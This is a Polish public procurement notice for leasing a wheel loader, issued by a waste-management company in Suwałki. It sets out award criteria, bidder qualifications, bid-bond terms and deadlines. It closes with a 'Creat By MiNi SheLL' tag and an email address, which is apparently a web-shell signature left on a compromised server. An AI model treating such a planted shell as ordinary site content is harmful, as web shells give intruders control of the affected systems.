wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>Warunkiem udziału w postępowaniu jest posiadanie aktualnego ubezpieczenia<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na kwotę nie mniejszą niż 400.000,00 zł słownie:<br/>czterysta tysięcy 00/100 złotych. Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca przedłoży Dokument<br/>potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości 400.000,00 zł.<br/>2) zdolności technicznej lub zawodowej: w zakresie doświadczenia:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował (zakończył) co najmniej jedną dostawę ładowarki<br/>kołowej, o parametrach nie gorszych niż wskazane w opisie przedmiotu zamówienia - Rozdział 3 ust. 2 Lp. 1-11 SWZ.<br/>Zamawiający uzna warunek za spełniony jeżli Wykonawca przedłoż wykaz dostaw wykonanych, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania<br/>i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały<br/>wykonane należycie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie<br/>wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –Załącznik nr 4 do SWZ,<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego (Rozdział 15 ust. 2 pkt 3),<br/>2) Wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich<br/>trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem<br/>dowodów określających czy te dostawy zostały wykonane należycie – Załącznika nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Wykonawca polegający na zasobach innych podmiotów:<br/>1) Wykonawca może w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają dostawę do realizacji których te<br/>zdolności są wymagane.<br/>3) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub<br/>inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>4) Zobowiązanie podmiotu udostępniającego zasoby musi potwierdzać, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa, w szczególności:<br/>a) Zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b) Sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykorzystaniu zamówienia,<br/>c) Czy i w jakim zakresie podmiot udostępniających zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału<br/>w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje dostawę, których<br/>wskazane zdolności dotyczą.<br/>5) Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, a także bada, czy nie<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>6) Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający<br/>żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami<br/>albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>7) Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>8) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o którym mowa w Rozdziale 15 ust. 1 SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>9) Podmiot trzeci, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w<br/>postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz 109 ust. 1 pkt 4 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium w wysokości 8.000,00 zł (słownie: osiem tysięcy 00/100 złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Przedsiębiorstwa<br/>Gospodarki Odpadami w Suwałkach Sp. z o. o.,<br/>ul. Sejneńska 82, 16-400 Suwałki, Banku PEKAO S.A. Oddział w Suwałkach<br/>nr 57 1240 3363 1111 0010 4404 5992 z dopiskiem „wadium znak sprawy:<br/>K-17/2023”.<br/>5. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie<br/>do dnia upływu terminu związania ofertą z wyjątkiem przypadków, o których mowa<br/>w art. 98 ust. 1 pkt. 2 i 3 oraz ust. 2.<br/>6. Za termin wniesienia wadium w formie pieniężnej przyjmuje się datę jego wpływu na rachunek Zamawiającego.<br/>7. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>ustawie Pzp,<br/>2) z jej treści powinno jednoznacznej wynikać nieodwołalne zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert),<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>6) beneficjentem poręczenia lub gwarancji jest: Przedsiębiorstwo Gospodarki Odpadami Sp. z o. o., ul. Sejneńska 82, 16-<br/>400 Suwałki, NIP: 8442350209<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(art. 58 ustawy Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z<br/>tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej<br/>treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>8) Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwróci wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert,<br/>2) którego oferta została odrzucona,<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynności unieważnienia albo<br/>nie upłynął termin do jego wniesienia.<br/>9. Złożenie wniosku o zwrot wadium, o którym mowa w ust. 8, powoduje rozwiązanie stosunku prawnego w wykonawcą<br/>wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o której mowa w Dziale IX „Środki ochrony<br/>prawnej” ustawy Pzp.<br/>10. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą,<br/>2) zawarcia umowy w sprawie zamówienia publicznego,<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na<br/>czynności unieważnienia albo nie upłynął termin do jego wniesienia.<br/>11. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub<br/>poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium.<br/>12. W ofercie należy wpisać nr konta, na który Zamawiający będzie mógł zwrócić wadium wniesione w pieniądzu. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4. Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki<br/>cywilne):<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji wystawione zgodnie z wymogami ustawowymi,<br/>podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie należy załączyć<br/>do oferty.<br/>3) Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie lub przez upoważnionego<br/>przedstawiciela.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy.<br/>5) Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu<br/>jako najkorzystniejsza przed podpisaniem umowy zamawiający zażąda w wyznaczonym terminie złożenia umowy<br/>regulującej współpracę tych wykonawców, podpisanej przez wszystkich wykonawców, przy czym termin, na jaki została<br/>zawarta nie może być krótszy niż termin realizacji zamówienia.<br/>6) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej dla Wykonawców,<br/>którzy wspólnie ubiegają się o zamówienie zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>7) Warunek dotyczący zdolności technicznej lub zawodowej a mianowicie wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonują roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>8) W przypadku, o którym mowa w ust. 2 pkt. 3, zgodnie z art. 58 ust. 4 ustawy Pzp, Zamawiający zastrzega, że warunek<br/>opisany w Rozdziale 15 ust. 2 pkt 3) nie podlega sumowaniu. Oznacza to, że Wykonawca składający ofertę musi wykazać<br/>się całym wymaganym doświadczeniem lub jeden z uczestników konsorcjum musi wykazać spełnienie warunku udziału.<br/>9) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>10) W przypadku, o którym mowa w ust. 2 pkt. 4 ppkt. c) i ust. 4 pkt. 6, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy.<br/>11) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełnienia warunków, o których mowa art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach:<br/>1) zmiany terminu przewidzianego na zakończenie dostawy w przypadku wstrzymania dostawy przez Zamawiającego;<br/>2) zmiana stawki podatku VAT w przypadku wystąpienia ustawowej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-20 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wzór umowy leasingu zostanie przedstawiony (dołączony do oferty) przez Wykonawcę wraz z harmonogramem spłat<br/>leasingowych. Zamawiający dopuszcza przedłożenie harmonogramu finansowego spłat leasingowych w dacie odbioru<br/>przedmiotem zamówienia). Umowa zostanie zawarta na wzorze przedstawionym przez Wykonawcę z uwzględnieniem postanowień zawartych w rozdziale 33 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com